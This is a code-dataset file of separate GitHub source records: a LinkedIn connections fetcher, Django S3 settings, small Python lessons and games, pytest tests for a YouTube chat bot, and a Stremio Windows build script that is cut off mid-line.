linkedin.LinkedInDeveloperAuthentication(CONSUMER_KEY, CONSUMER_SECRET,\n USER_TOKEN, USER_SECRET,\n RETURN_URL, linkedin.PERMISSIONS.enums.values())\n# Pass it in to the app...\n\napi = linkedin.LinkedInApplication(authentication)\n\n# Now do something like get your connections:\n\nif api:\n connections = api.get_connections()\nelse:\n print >> sys.stderr, 'Failed to authenticate. You need to learn to dance'\n sys.exit(1)\n\n# Be careful - this type of API usage is \"expensive\".\n# See http://developer.linkedin.com/docs/DOC-1112\n\nprint >> sys.stderr, 'Fetching extended connections...'\n\nextended_connections = []\ntry:\n for c in connections['values']:\n extended_connections.append(api.get_profile(member_id=c['id'], member_url=None, selectors=[\n 'first-name',\n 'last-name',\n 'current-status',\n 'educations',\n 'specialties',\n 'interests',\n 'honors',\n 'positions',\n 'industry',\n 'summary',\n 'location',\n ]))\nexcept LinkedInError:\n pass\n\n# Store the data\n\nif not os.path.isdir('out'):\n os.mkdir('out')\n\nf = open('out/linkedin_connections.pickle', 'wb')\ncPickle.dump(extended_connections, f)\nf.close()\n\nprint >> sys.stderr, 'Data pickled to out/linkedin_connections.pickle'\n","repo_name":"ptwobrussell/Mining-the-Social-Web","sub_path":"python_code/linkedin__get_connections.py","file_name":"linkedin__get_connections.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":1208,"dataset":"github-code","pt":"53"} +{"seq_id":"71896703207","text":"# defines settings for applications using the DockerEc2 construct\nfrom .base import * # noqa\n\nDEBUG = False\n\nAWS_DEFAULT_ACL = None\nSTATICFILES_STORAGE = \"backend.storage_backends.StaticStorage\"\n\nAWS_STATIC_LOCATION = \"static\"\n\nAWS_PRIVATE_MEDIA_LOCATION = \"media/private\"\nPRIVATE_FILE_STORAGE = \"backend.storage_backends.PrivateMediaStorage\"\n\nAWS_PRELOAD_METADATA = True\nAWS_STORAGE_BUCKET_NAME = os.environ[\"S3_BUCKET_NAME\"] # noqa\nAWS_S3_CUSTOM_DOMAIN = f\"{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com\"\nSTATIC_ROOT = f\"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/static/\"\nMEDIA_ROOT = f\"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/media/\"\n","repo_name":"briancaffey/django-step-by-step","sub_path":"backend/backend/settings/swarm_ec2.py","file_name":"swarm_ec2.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"53"} +{"seq_id":"20493451590","text":"import pygame\n\n\nHEIGHT = 350\nWIDTH = 700\ndisplaysurface = pygame.display.set_mode((WIDTH, HEIGHT))\n\nclass Dungeon(pygame.sprite.Sprite):\n def __init__(self):\n super().__init__()\n self.hide = False\n self.image = pygame.image.load(\"assets/Dungeon.png\")\n \n def update(self):\n if self.hide == False:\n displaysurface.blit(self.image, (400, 80))","repo_name":"bucs110FALL22/final-project-sangyoon-and-brian","sub_path":"src/dungeon.py","file_name":"dungeon.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42731275462","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 17 14:07:35 2020\r\nThis code is on WuDLcourse \r\nCode is conducted by the video on www.bilibili.com/keyword?=深度学习_Deep_Learning_Pytorch特别制作版\r\n@Discription: 本文件是吴恩达课程中C1_W2_11第11讲的内容,用于说明\r\n 1.为何深度学习中,要尽量避免for循环的使用\r\n 2.numpy中的广播规则\r\n 3.numpy中的向量操作\r\n@author: Netfather\r\n@Last Modified data: 2021年1月19日\r\n\"\"\"\r\n#%%\r\n# 0.导入必要包\r\nimport numpy as np\r\nimport time\r\nimport math\r\n\r\n\r\n#%%\r\n#1.Code on C1_W2_11\r\n#开始讲解向量化操作,如下代码例子描述了使用向量化操作的时间优势\r\n#在深度学习中,不论怎样都要尽量避免使用for循环代码\r\n\r\n\r\na = np.random.rand(1000000)\r\nb = np.random.rand(1000000)\r\n\r\n#如下是向量化操作代码实现a,b元素的点乘\r\ntic = time.time()\r\nc = np.dot(a,b)\r\ntoc = time.time()\r\n\r\nprint(c)\r\nprint(\"The vectorized version: \" + str((toc-tic)*1000) + \"ms\")\r\n\r\n#如下是for循环操作代码,用于实现a,b元素的点乘\r\nc = 0\r\ntic = time.time()\r\nfor i in range(1000000):\r\n c += a[i]*b[i]\r\ntoc = time.time()\r\n\r\nprint(c)\r\nprint(\"The For loop version: \" + str((toc-tic)*1000) + \"ms\")\r\n\r\n#%%\r\n#2.Code on C1_W2_12\r\n#如下代码比较对一列向量取指数的操作\r\n\r\na = np.random.rand(1000000).reshape(1000000,1)\r\n\r\n#如下是for循环代码,实现向量指数操作\r\ntic = time.time()\r\nfor i in range(1000000):\r\n if (i % 100000 == 0): \r\n print(a[i,0])\r\n temp = math.exp(a[i,0])\r\ntoc = time.time()\r\nprint(\"The For loop version: \" + str((toc-tic)*1000) + \"ms\")\r\n\r\n#如下是向量化代码,实现向量每个元素的指数操作\r\ntic = time.time()\r\na = np.exp(a)\r\ntoc = time.time()\r\n\r\nprint(\"The vectorized version: \" + str((toc-tic)*1000) + \"ms\")\r\n\r\n#%%\r\n#3.Code on C1_W2_15\r\n#这部分展示了python中numpy下的广播规则\r\n# broadcast是numpy中最具有特性的特征,简单表现为对于两个维度不匹配,但是在某些维度匹配的变量\r\n# 遵循某种规则的实现二者的运算:广播到相同维度,然后运算\r\n\r\nA = np.array([[56.0,0.0,4.4,68.0],\r\n [1.2,104.0,52.0,8.0],\r\n [1.8,135.0,99.0,0.9]])\r\n\r\nprint(A.shape)\r\n\r\nrow_Sum = A.sum(axis =0)\r\nprint (row_Sum, row_Sum.shape) #一旦指定维度,这个维度就会消失,因此下面需要reshape\r\n\r\npercentage = A.T / row_Sum.reshape(4,1) #numpy中运算列优先对齐规则\r\nprint(percentage)\r\npercentage2 = A / row_Sum.reshape(1,4) #numpy中运算列优先对齐规则\r\nprint(percentage2)\r\n\r\nB = np.arange(1,7).reshape(2,3)\r\nprint(B)\r\n\r\n#列数量一致相加\r\nC = np.array([100,200,300]).reshape(1,3)\r\nprint(B+C)\r\n#行数量一致相加\r\nD = np.array([100,200]).reshape(2,1)\r\nprint(B+D)\r\n\r\n#%%\r\n#4.Code on C1_W2_16\r\n#numpy向量操作说明\r\n\r\na = np.random.randn(5)\r\nprint(a,a.shape)\r\n#关于维度消失的那一列或者那一行,需要非常小心的维护!\r\n\r\nprint(np.dot(a,(a.T)))\r\n\r\n#因此为了避免歧义,我们需要明确的指定reshape之后的大小到底是多少\r\nb = np.random.randn(5).reshape(5,1)\r\nprint(np.dot(b,b.T))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ShinewineW/LearningSmth","sub_path":"WuDeepLearningCourse/C1_W2_CourseCode.py","file_name":"C1_W2_CourseCode.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1258829862","text":"# Name:\n# MIT Username: \n# 6.S189 Project 1: Hangman template\n# hangman_template.py\n\n# Import statements: DO NOT delete these! DO NOT write code above this!\nfrom random import randrange\nfrom string import *\n\n# -----------------------------------\n# Helper code\n# (you don't need to understand this helper code)\n# Import hangman words\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef load_words():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print( \" \", len(wordlist), \"words loaded.\")\n print('Enter play_hangman() to play a game of hangman!')\n return wordlist\n\n# actually load the dictionary of words and point to it with \n# the words_dict variable so that it can be accessed from anywhere\n# in the program\nwords_dict = load_words()\n\n\n# Run get_word() within your program to generate a random secret word\n# by using a line like this within your program:\n# secret_word = get_word()\n\ndef get_word():\n \"\"\"\n Returns a random word from the word list\n \"\"\"\n word=words_dict[randrange(0,len(words_dict))]\n return word\n\n# end of helper code\n# -----------------------------------\n\n\n# CONSTANTS\nMAX_GUESSES = 6\n\n# GLOBAL VARIABLES \nsecret_word = '' # Change this \nletters_guessed = []\n\n# From part 3b:\ndef word_guessed():\n '''\n Returns True if the player has successfully guessed the word,\n and False otherwise.\n '''\n global secret_word\n global letters_guessed\n\ndef is_word_guessed(secret_word,letters_guessed):\n word_length=len(secret_word)\n Runs=list(range(word_length))\n missing_letter=0\n for i in Runs:\n test=secret_word[i]\n if (test in letters_guessed)==False:\n missing_letter=1\n if missing_letter==0:\n return True\n elif missing_letter==1:\n return False\n\ndef print_guessed():\n '''\n Prints a string that contains the word with a dash \"-\" in\n place of letters not guessed yet. \n '''\n global secret_word\n global letters_guessed\n \ndef get_guessed_word(secret_word,letters_guessed):\n word_length=len(secret_word)\n Runs=list(range(word_length))\n Progress=''\n for i in Runs:\n test_letter=secret_word[i]\n if (test_letter in letters_guessed)==True:\n Progress=Progress+test_letter\n elif (test_letter in letters_guessed)==False:\n Progress=Progress+'_ '\n return Progress\n\ndef get_available_letters(letters_guessed):\n alphabet='abcdefghijklmnopqrstuvwxyz'\n Runs=list(range(26))\n remaining_letters=''\n for i in Runs:\n if (alphabet[i] in letters_guessed)==False:\n remaining_letters=remaining_letters+alphabet[i]\n return remaining_letters\n\n\ndef play_hangman():\n global secret_word\n global letters_guessed\n\n secret_word=get_word()\n guesses_remaining=6\n warnings_remaining=3\n Win=False\n letters_guessed=[]\n available_letters='abcdefghijklmnopqrstuvwxyz'\n partial_word=get_guessed_word(secret_word,letters_guessed)\n\n while guesses_remaining>0 and Win==False:\n\n print(partial_word)\n print('----------------------')\n print('You have ', guesses_remaining, ' guesses left')\n print('Available letters: ', available_letters)\n\n guess=input(\"Choose a letter that might be in the word: \")\n\n if type(guess)==str and guess[0].islower()==False:\n guess=guess.lower()\n\n if (type(guess)!=str)==True or (guess in available_letters)==False:\n warnings_remaining=warnings_remaining-1\n print('Hangman only accepts letters as input, that you have not already guessed. You have ', warnings_remaining ,' warnings left.')\n if warnings_remaining<=0:\n guesses_remaining=guesses_remaining-1\n print('Invalid characters are being inputted. You have ',guesses_remaining,' guesses remaining.')\n else:\n letters_guessed.append(guess)\n\n Win=is_word_guessed(secret_word,letters_guessed)\n if Win==True:\n print('Congratulations, you have correctly guessed ', secret_word, ' as the word')\n return True\n elif Win==False:\n partial_word=get_guessed_word(secret_word,letters_guessed)\n available_letters=get_available_letters(letters_guessed)\n if (guess in secret_word)==True:\n print('That letter is in the word, you now have:')\n elif (guess in secret_word)==False:\n guesses_remaining=guesses_remaining-1\n print('That letter is not in the word, you still have: ')\n if guesses_remaining==0:\n print('You have failed to guess the word. The word is ', secret_word)\n return False\n\n # Update secret_word. Don't uncomment this line until you get to Step 8.\n # secret_word = get_word()\n\n","repo_name":"NaomiKennedy58/Hangman-Code","sub_path":"hangman_template.py","file_name":"hangman_template.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71770666728","text":"# Dictionaries\n\n#Dictionaries use a key/value pairs\n\n#key = a reference to a particular object\n#value = data storage mechanism you want to use\n\n# Create a dictionary\n\nstudent_1 = {\n \"name\" : \"Belal\",\n \"stream\" : \"Devops\",\n \"completed_lessons\": 4,\n \"completed_lesson_names\": [\"variables\", \"data_types\", \"set_up\"]\n}\n#Access data within a dictionary\n\nprint(student_1[\"stream\"])\n#Access particular parts of the list\nprint(student_1[\"completed_lesson_names\"][1])\n\n# changing a value in a dictionary\n\nstudent_1[\"completed_lessons\"] = 3\nprint(student_1[\"completed_lessons\"])\n\n# Removing items from a dictionary\n\nstudent_1[\"completed_lesson_names\"].remove(\"data_types\")\nprint(student_1[\"completed_lesson_names\"])\n\n#get the value\n\ncar = {\n \"make\": \"Ford\",\n \"model\": \"Fiesta\",\n \"colour\": \"Blue\",\n \"year\": \"2011\",\n}\n\nprint(car)\ncar[\"condition\"] = \"Moderate\"\n\nprint(car)\n","repo_name":"belalb100/tech201_collections","sub_path":"dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4384639519","text":"import asyncio\nfrom asyncio.events import AbstractEventLoop\n\nimport pytest\nfrom aiohttp.client import ClientSession\n\nfrom chatto import errors, events\nfrom chatto.secrets import Secrets\nfrom chatto.youtube import YouTubeBot\nfrom tests.paths import SECRETS_PATH\nfrom tests.test_secrets import secrets\n\n\n@pytest.fixture()\ndef loop() -> AbstractEventLoop:\n # This has to use new even in < Python 3.10.\n return asyncio.new_event_loop()\n\n\n@pytest.fixture()\ndef youtube_bot() -> YouTubeBot:\n return YouTubeBot(\n \"riuebg0843b9g8n4gb8493\",\n \"f84ng0409gj490gh43809gh\",\n )\n\n\n@pytest.fixture()\ndef authed_youtube_bot() -> YouTubeBot:\n return YouTubeBot(\n \"riuebg0843b9g8n4gb8493\",\n \"f84ng0409gj490gh43809gh\",\n secrets_file=SECRETS_PATH,\n )\n\n\ndef test_create_youtube_bot(youtube_bot: YouTubeBot) -> None:\n assert youtube_bot.api_key == \"riuebg0843b9g8n4gb8493\"\n assert youtube_bot.channel_id == \"f84ng0409gj490gh43809gh\"\n assert youtube_bot.tokens == {}\n\n\ndef test_create_authed_youtube_bot(\n authed_youtube_bot: YouTubeBot, secrets: Secrets\n) -> None:\n assert authed_youtube_bot.api_key == \"riuebg0843b9g8n4gb8493\"\n assert authed_youtube_bot.channel_id == \"f84ng0409gj490gh43809gh\"\n assert authed_youtube_bot.tokens == {}\n assert authed_youtube_bot._secrets == secrets\n\n\ndef test_create_youtube_bot_no_channel_id() -> None:\n with pytest.raises(errors.MissingRequiredInformation) as exc:\n YouTubeBot(\"token\", \"\")\n assert str(exc.value) == \"a channel ID must be provided\"\n\n\ndef test_properties_on_creation(youtube_bot: YouTubeBot) -> None:\n assert not youtube_bot.loop\n assert not youtube_bot.session\n assert not youtube_bot.stream\n assert not youtube_bot.authorised\n assert not youtube_bot.authorized\n assert not youtube_bot.access_token\n assert youtube_bot.platform == \"youtube\"\n\n\ndef test_listen_decorator(youtube_bot: YouTubeBot) -> None:\n assert youtube_bot.events.callbacks == {}\n\n @youtube_bot.listen(events.MessageCreatedEvent)\n async def youtube_cb(event: events.MessageCreatedEvent) -> None:\n ...\n\n assert len(youtube_bot.events.callbacks) == 1\n\n\ndef test_create_session(youtube_bot: YouTubeBot, loop: AbstractEventLoop) -> None:\n loop.run_until_complete(youtube_bot.create_session(loop))\n assert isinstance(youtube_bot._session, ClientSession)\n assert youtube_bot.session == youtube_bot._session\n","repo_name":"parafoxia/chatto","sub_path":"tests/test_youtube.py","file_name":"test_youtube.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"14852405925","text":"# Title: Stremio Windows Build Script\n# Author: ShoobyDoo\n# Date: 2023-03-13\n# Edited: 2023-03-18\n# Version: 0.1.0\n\nimport os\nimport sys\nimport glob\nimport string\nimport time\nimport json\nimport subprocess\nimport shutil\n\nfrom pprint import pprint\nfrom typing import Union\nfrom ctypes import windll\n\nfrom helpers import Helpers\n\n\nclass Depends:\n def __init__(self):\n # [---------------------------------------------------------BUILD DEPENDENCIES---------------------------------------------------------] #\n # Git version: latest as of 2023-03-15\n self.GIT_URL = \"https://github.com/git-for-windows/git/releases/download/v2.39.2.windows.1/Git-2.39.2-64-bit.exe\"\n\n # Qt version: 5.12.7 x86 (indicated by Stremio)\n self.QT_URL = \"https://qt.mirror.constant.com/archive/qt/5.12/5.12.7/qt-opensource-windows-x86-5.12.7.exe\"\n\n # OpenSSL version: 1.1.1 32bit (indicated by Stremio)\n self.OSSL_URL = \"https://slproweb.com/download/Win32OpenSSL-1_1_1t.exe\"\n\n # NodeJS version: 8.17.0 x86 (indicated by Stremio)\n self.NODEJS_URL = \"https://nodejs.org/dist/v8.17.0/win-x86/node.exe\"\n\n # FFMPEG version: 3.3.4 32 bit (indicated by Stremio) (Prefaced by: Other versions may also work)\n self.FFMPEG_URL = \"https://github.com/GyanD/codexffmpeg/releases/download/4.3.1-2020-11-08/ffmpeg-4.3.1-2020-11-08-full_build-shared.zip\"\n\n # MPV version: latest (dev-i686 indicated by Stremio) as of 2023-03-15\n self.LIBMPV_URL = \"https://master.dl.sourceforge.net/project/mpv-player-windows/libmpv/mpv-dev-i686-20230312-git-9880b06.7z?viasf=1\"\n\n # VS Community version: 2017 (indicated by Stremio)\n self.VSCOMM_URL = \"https://download.visualstudio.microsoft.com/download/pr/4de9b77e-bbd8-4a05-a083-662e1a187b94/fa117cc0e7e02d61a420803605d5723993d590269e92d5b1cd85db2e7b60d48c/vs_Community.exe\"\n\n # CMAKE version: latest as of 2023-03-15\n self.CMAKE_URL = \"https://github.com/Kitware/CMake/releases/download/v3.26.0/cmake-3.26.0-windows-x86_64.msi\"\n # [---------------------------------------------------------BUILD DEPENDENCIES---------------------------------------------------------] #\n\n self.drives = []\n self.depend_paths = {\n \"git\": \"\",\n \"qt\": \"\",\n \"openssl\": \"\",\n \"vs_community\": \"\",\n \"nodejs\": \"\",\n \"ffmpeg\": \"\",\n \"mpv\": \"\"\n }\n self.ljust = 50\n \n # set the path to the config file if it exists, otherwise set to None\n self.cfg_path = glob.glob('./abs/abs.json')[0] if len(glob.glob('./abs/abs.json')) > 0 else None \n\n # do this in the instantiation instead of everytime we check a depend\n d_bitmask = windll.kernel32.GetLogicalDrives()\n \n for letter in string.ascii_uppercase:\n if d_bitmask & 1:\n self.drives.append(letter)\n d_bitmask >>= 1\n\n\n def check_depend(self, pgm_args: Union[str, list], pgm_name: str, pgm_url: str) -> None:\n \"\"\"\n Checks if a program is installed.\n\n Args:\n pgm_args (str | list): The arguments to pass to the program.\n pgm_name (str): The name of the program.\n pgm_out_filename (str): The filename to save the program as.\n \"\"\"\n\n try:\n time.sleep(0.15)\n print(f\"Checking if {pgm_name} is installed...\".ljust(self.ljust, '.'), end='')\n if type(pgm_args) == str:\n pgm_args = pgm_args.split()\n\n sp_pgm = subprocess.run(pgm_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n if sp_pgm.returncode == 0:\n print(f\"OK: \" + sp_pgm.stdout.decode().split('\\n')[0].strip())\n self.depend_paths[pgm_name.lower()] = pgm_args[0] \n \n except FileNotFoundError:\n print(f\"NO: {pgm_name} not on path...\\n\\nSearching default install paths on all drives...\")\n self.verify_depend(pgm_name, pgm_url)\n\n\n def verify_depend(self, pgm_name: str, pgm_url: str) -> None:\n # verify depend: Git\n if pgm_name == \"Git\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files\\\\Git\")\n\n # verify depend: Qt\n # TODO: could be refactored to be more generic?\n elif pgm_name == \"Qt\":\n # not going to use the self.check_path() method here because it's a bit different\n qt_path_struct = \":\\\\Qt\\\\Qt5.12.7\\\\5.12.7\"\n qt_path_struct_addons = \":\\\\Qt\\\\Qt5.12.7\\\\installerResources\"\n\n for drive_letter in self.drives:\n qt_webe = glob.glob(f\"{drive_letter}{qt_path_struct_addons}\\\\qt.qt5.5127.qtwebengine*\") # wildcard for webengine\n qt_msvc = glob.glob(f\"{drive_letter}{qt_path_struct_addons}\\\\qt.qt5.5127.win32_msvc*\") # wildcard for msvc\n qt_msvc_bin = glob.glob(f\"{drive_letter}{qt_path_struct}\\\\msvc*\") # wildcard for BASE_DIR/msvc/bin\n \n # check if default qt 5.12.7 install path exists \"C:\\Qt\\Qt5.12.7\\5.12.7\\msvc2017\\bin\\\"\n if len(glob.glob(f\"{qt_msvc_bin[0]}\\\\bin\\\\windeployqt.exe\")) > 0:\n self.depend_paths[pgm_name.lower()] = f\"{qt_msvc_bin[0]}\\\\bin\\\\windeployqt.exe\"\n print(f\"Found {pgm_name}! [{self.depend_paths[pgm_name.lower()]}]\\n\\nVerifying Qt Addons...\")\n \n if len(qt_webe) > 0 and len(qt_msvc) > 0:\n print(\"Qt WebEngine: OK\\nQt MSVC: OK\\n\")\n else:\n print(\"One of the following: [Qt WebEngine, Qt MSVC (32 Bit)] were missing from your Qt installation...\\nPlease correct this and try again.\")\n \n print(\"Checking if Qt is installed...\".ljust(self.ljust, '.') + f\"OK: {self.depend_paths[pgm_name.lower()]}\")\n break\n else:\n self.depend_not_found(pgm_name, pgm_url)\n\n # verify depend: OpenSSL\n elif pgm_name == \"OpenSSL\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files (x86)\\\\OpenSSL-Win*\\\\bin\\\\openssl.exe\")\n\n # verify depend: NodeJS\n elif pgm_name == \"NodeJS\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files\\\\nodejs\\\\node.exe\")\n\n # verify depend: FFMpeg\n elif pgm_name == \"FFMpeg\":\n self.check_path(pgm_name, pgm_url, \"ffmpeg.exe\")\n\n # verify depend: MPV\n elif pgm_name == \"MPV\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files\\\\MPV\\\\bin\\\\mpv.exe\")\n\n # verify depend: VS Community version 2017\n elif pgm_name == \"VS_Community\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2017\\\\Community\\\\VC\\\\Auxiliary\\\\Build\\\\vcvars32.bat\")\n \n # verify depend: CMake\n elif pgm_name == \"CMake\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files\\\\CMake\\\\bin\\\\cmake.exe\")\n\n\n def check_path(self, pgm_name: str, pgm_url: str, path_struct: str) -> None:\n \"\"\"\n Checks if a specific path exists on any drive.\n\n Args:\n pgm_name (str): The name of the program.\n pgm_url (str): The URL to the program download.\n path_struct (str): The path structure to check.\n \"\"\"\n\n current_drive = \"\"\n for drive_letter in self.drives:\n current_drive += f\"{drive_letter}:\\\\, \" if drive_letter != self.drives[-1] else f\"{drive_letter}:\\\\\"\n print(f\"Checking {current_drive} for {pgm_name}...\", end='\\r')\n time.sleep(0.05)\n \n # if the path doesnt start with the colon, its likely a relative path\n if not path_struct.startswith(\":\"):\n path_to_check = glob.glob(f\"{path_struct}\")\n else:\n path_to_check = glob.glob(f\"{drive_letter}{path_struct}\")\n\n if len(path_to_check) > 0:\n self.depend_paths[pgm_name.lower()] = path_to_check[0]\n print(f\"\\n\\nFound {pgm_name}! [{self.depend_paths[pgm_name.lower()]}]\\n\")\n\n # VERIFY: depending on the program, checking the versin could be --version or just version\n if pgm_name in ['OpenSSL']:\n pgm_args = [f\"{self.depend_paths[pgm_name.lower()]}\", \"version\"]\n else:\n pgm_args = [f\"{self.depend_paths[pgm_name.lower()]}\", \"--version\"]\n\n self.check_depend(pgm_args, pgm_name, pgm_url)\n break\n\n else:\n print('\\n')\n self.depend_not_found(pgm_name, pgm_url)\n\n\n def depend_not_found(self, pgm_name: str, pgm_url: str):\n print(f\"{pgm_name} not found on any drive.\")\n\n if Helpers.ynp(\"Is it installed anywhere else?\"):\n while True:\n pgm_path = input(\"Enter the path to the program: \")\n if os.path.exists(pgm_path):\n print(f\"Found {pgm_name} at: {pgm_path}\")\n break\n else:\n print(f\"Could not find {pgm_name} at: {pgm_path}\")\n\n else:\n if Helpers.ynp(\"Would you like me to grab it?\"):\n # have dlf return params and do the install here, so we can set the path\n dlf = Helpers.download_file(pgm_url, f\"{pgm_name}.exe\")\n \n # dlf returns tuple with filename and file type\n insf = Helpers.install_file(dlf[0], dlf[1])\n\n # if install file didnt return none\n if insf:\n self.depend_paths[pgm_name.lower()] = insf\n\n else:\n print(f\"Please install it manually and try again as the script may now break.\\nSee: {pgm_url}\")\n\n\n def get_all_paths(self) -> None:\n return self.depend_paths\n\n\n @staticmethod\n def reset_config(config_path) -> None:\n os.remove(config_path)\n\n\n def write_config(self, key = None, value = None):\n print(\"\\nChecking for existing config...\")\n\n if self.cfg_path and key != None:\n print(\"Existing config found. Reading...\")\n conf = json.load(open(self.cfg_path))\n conf['DEPENDS'][key] = value\n \n print(f\"Writing key/val: [{key} -> {value}] to config file...\")\n json.dump(conf, open(self.cfg_path, 'w'), indent=4)\n else:\n # check to see if the abs path exists, otherwise create it\n if not os.path.exists('abs'): os.mkdir('abs')\n\n # generate the default config, which will be everything we've done in the program so far\n print(\"No configuration file was found. Generating default...\")\n default = {\n 'DEPENDS': self.get_all_paths()\n }\n\n # write the default config to the abs.json file\n json.dump(default, open('./abs/abs.json', 'w'), indent=4)\n\n\n def read_config(self, filename='abs.json', filepath = './abs/'):\n if len(glob.glob(f\"{filepath}{filename}\")) > 0:\n print(f\"Config ({filename}) found. Reading...\")\n conf = json.load(open(f'{filepath}{filename}'))\n return conf\n else:\n print(\"Error! No configuration file was found. Please run the script again to generate one.\\n(This should never fire, reproduce this error and report it to the developer.)\")\n\n\n @staticmethod\n def where_is_path_var(path_var):\n \"\"\"\n Returns the path of a variable in the PATH environment variable.\n \"\"\"\n for path in os.environ['PATH'].split(os.pathsep):\n if path_var in path:\n return f\"{path}\\\\{path_var}.exe\" # windows only\n\n\n def build_stremio(self):\n print(\"Building Stremio...\\nCloning Stremio repo...\")\n # subprocess.run([\"git\", \"clone\", \"--recursive\", \"https://github.com/Stremio/stremio-shell.git\"])\n print(\"\\ndone.\\n\")\n\n print(\"Setting up build environment...\")\n os.chdir(\"stremio-shell\") # since we just chdir'd into stremio-shell paths get shifted -> ../{whatever} ???\n \n # # TODO: DYNAMIC CHECK, DO NOT LEAVE HARD CODED\n # sys.path.append(\"C:\\\\Qt\\\\Qt5.12.7\\\\5.12.7\\\\msvc2017\\\\bin\")\n # sys.path.append(\"C:\\\\OpenSSL-Win32\\\\bin\")\n\n # input(os.getcwd())\n vcvars_out = subprocess.check_output(f'\"{self.depend_paths[\"vs_community\"]}\" && \\\n FOR /F \"usebackq delims== tokens=2\" %i IN (`type stremio.pro ^| find \"VERSION=4\"`) DO set package_version=%i && echo %i', shell=True)\n \n strem_ver = vcvars_out.decode('utf-8').splitlines()[-1]\n print(f\"Pulled Stremio package version: {strem_ver}\")\n \n serverjs_url = f\"https://s3-eu-west-1.amazonaws.com/stremio-artifacts/four/v{strem_ver}/server.js\"\n if not os.path.exists(\"server.js\"): Helpers.basic_download(serverjs_url, \"server.js\")\n print(\"\\ndone.\\n\")\n\n # TODO: ensure the qt5dir path is not hardcoded and automatically grabbed somewhere in the initial instantiantion of the config items\n print(\"Building the Stremio Shell...\")\n subprocess.run(f'\"{self.depend_paths[\"vs_community\"]}\" && cmake -G\\\"NMake Makefiles\\\" -DCMAKE_PREFIX_PATH=\"C:\\\\Qt\\\\Qt5.12.7\\\\5.12.7\\\\msvc2017\\\\lib\\\\cmake\\\\Qt5\" -DCMAKE_BUILD_TYPE=Release . && cmake --build ..', shell=True)\n # os.system(f'\"{self.depend_paths[\"vs_community\"]}\" && ')\n print(\"\\ndone.\\n\")\n\n print(\"Building solution directory structure...\")\n if not os.path.exists(\"abs-dist-win\"): \n os.mkdir(\"abs-dist-win\")\n else:\n # otherwise, clean the directory\n shutil.rmtree(\"abs-dist-win\")\n os.mkdir(\"abs-dist-win\")\n\n # OK\n print(\"Copying .\\\\stremio.exe -> abs-dist-win\\\\stremio.exe...\")\n shutil.copyfile('stremio.exe', 'abs-dist-win\\\\stremio.exe')\n print(\"\\ndone.\\n\")\n \n # OK\n print(\"Copying C:\\\\Windows\\\\System32\\\\msvcr120.dll -> abs-dist-win\\\\msvcr120.dll...\")\n shutil.copyfile('C:\\\\Windows\\\\System32\\\\msvcr120.dll', 'abs-dist-win\\\\msvcr120.dll')\n print(\"\\ndone.\\n\")\n \n # ..\\abs\\stremio-depends\\MPV\\libmpv-2.dll\n # input(self.depend_paths['mpv'] + \" : \" + os.getcwd())\n print(f\"Copying ..\\\\{self.depend_paths['mpv']} -> abs-dist-win\\\\{self.depend_paths['mpv']}...\")\n shutil.copyfile(f\"..\\\\{self.depend_paths['mpv']}\", f'abs-dist-win\\\\' + self.depend_paths[\"mpv\"].split(\"\\\\\")[-1].replace(\"2\", \"1\").replace(\"lib\", \"\"))\n print(\"\\ndone.\\n\")\n \n print(\"Copying .\\\\windows\\\\DS\\\\* -> abs-dist-win\\\\DS\\\\*...\")\n shutil.copytree('windows\\\\DS', 'abs-dist-win\\\\DS')\n print(\"\\ndone.\\n\")\n \n print(\"Copying server.js -> abs-dist-win\\\\server.js...\")\n shutil.copyfile('server.js', 'abs-dist-win\\\\server.js')\n print(\"\\ndone.\\n\")\n \n print(f\"Copying .\\\\{self.depend_paths['openssl'].replace('openssl.exe', 'libcrypto-1_1.dll')} -> abs-dist-win\\\\libcrypto-1_1.dll...\")\n shutil.copyfile(f\"{self.depend_paths['openssl'].replace('openssl.exe', 'libcrypto-1_1.dll')}\", 'abs-dist-win\\\\libcrypto-1_1.dll')\n print(\"\\ndone.\\n\")\n \n print(f\"Copying {self.where_is_path_var('node')} -> abs-dist-win\\\\node.exe...\")\n shutil.copyfile(f\"{self.where_is_path_var('node')}\", 'abs-dist-win\\\\node.exe')\n print(\"\\ndone.\\n\")\n \n print(f\"Copying ..\\\\{self.depend_paths['ffmpeg']} -> abs-dist-win\\\\ffmpeg.exe...\")\n shutil.copyfile(f\"..\\\\{self.depend_paths['ffmpeg']}\", 'abs-dist-win\\\\ffmpeg.exe')\n print(\"\\ndone.\\n\")\n \n print(\"Deploying QT 